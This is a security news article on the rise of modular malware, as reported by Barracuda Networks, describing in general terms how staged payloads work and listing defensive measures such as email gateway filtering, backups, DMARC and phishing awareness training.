Modular malware represents a sophisticated type of attack that launches in stages and adapts itself by analyzing the target’s environment and defenses. Since the beginning of the year, the use of modular malware has surged, with more than 150,000 unique malicious files detected by Barracuda Networks. In a Thursday report, the security provider offers advice on how organizations can protect themselves against this type of threat.

What makes modular malware more dangerous than “conventional” malware? Most malware is sent as spam with attached documents and files, using email distribution lists found on the dark web. If a user opens the infected file or document, the malware is automatically installed or runs a script to download and install it from an external source.

Modular malware works differently in that it sends a basic initial payload just to establish itself. The job of this payload is to gather information about the target’s system. After this initial connection is made, the malware signals a command and control center to download additional payloads, which are chosen based on the information obtained about the system, such as what type of security defenses are in place. As a result, modular malware can selectively launch different payloads and functionality based on the target and the goal behind the attack.

Modular malware has commonly been used in banking trojans, including Emotet, TrickBot, and CoreBot, as well as in infostealers such as LokiBot and Pony.

Combatting modular malware requires a multi-layered defense strategy, one that relies on technology and education. To protect and defend your organization against these types of attacks, Barracuda offers the following recommendations:

  1. Gateway defense

Organizations should establish advanced inbound and outbound security techniques, including malware detection, spam filters, firewalls, and sandboxing.

To detect emails with malicious documents, static and dynamic analysis should be used to determine if the attached document is trying to download and run an executable file, something no document should be doing in the first place. The URL for the executable file can be flagged by using heuristics or threat intelligence systems, said Barracuda. Static analysis can also be used to detect obfuscated code as a tipoff for suspicious files.

Further, spam filters and related security software can look for subtle clues even in malicious emails that look legitimate. Here, the goal is to prevent such emails from ever reaching the user’s inbox. In the event a user opens a malicious file attachment or clicks a link to download malware, an advanced firewall should be in place to try to stop the attack by blocking the executable file as it comes through.

File encryption and DPL (data loss prevention) can also help guard against the loss of critical data. Email archiving is another suggested practice for both compliance and business continuity.

2. Resiliency

Make sure you have a backup strategy to help you recover from lost or deleted files. Further, an email continuity process ensures that important emails can be sent even during an outage.

3. Fraud protection

Use artificial intelligence to prevent attacks that get past your email gateway. AI can be used to protect against spearphishing attacks. DMARC (Domain-based Message Authentication, Reporting & Conformance) validation can detect and stop email and domain spoofing.

4. Human firewall

The top layer of email defense is the most important–education. Include phishing simulation as part of the security awareness training you provide to your users. Make sure users are aware of these new types of attacks. Show them how to identify potential threats. Test the effectiveness of in-the-moment training and evaluate the users most vulnerable to attacks.

Image: iStockphoto/solarseven